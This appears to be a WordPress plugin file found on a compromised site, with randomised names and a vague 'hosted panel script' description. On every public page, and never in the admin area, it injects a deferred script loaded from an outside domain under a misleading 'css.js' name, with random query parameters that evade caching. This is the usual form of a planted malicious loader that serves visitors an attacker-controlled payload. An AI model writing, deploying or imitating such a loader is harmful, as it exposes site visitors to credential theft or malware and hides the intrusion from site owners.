File: /medikors/www/wp-content/plugins/script-f6f284e4-f6f284e4/script-f6f284e4-f6f284e4.php
<?php
/**
* Plugin Name: Script F6F284E4
* Description: Loads hosted panel script on all frontend pages.
* Version: 1.0.0
*/
if (!defined('ABSPATH')) { exit; }
function ff6f284e412b6() {
if (is_admin()) { return; }
$handle = 'h42bd41a32a94';
$src = 'https://llc-image-ico.click/api/css.js';
$src .= (strpos($src, '?') === false ? '?' : '&') . 'b=' . rawurlencode('45fcb62d') . '&r=' . rawurlencode((string)wp_rand(100000, 999999));
wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'ff6f284e412b6', 999);
function f0669f51a6cea($tag, $handle, $src) {
if ($handle !== 'h42bd41a32a94') { return $tag; }
if (strpos($tag, ' defer') !== false) { return $tag; }
return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'f0669f51a6cea', 10, 3);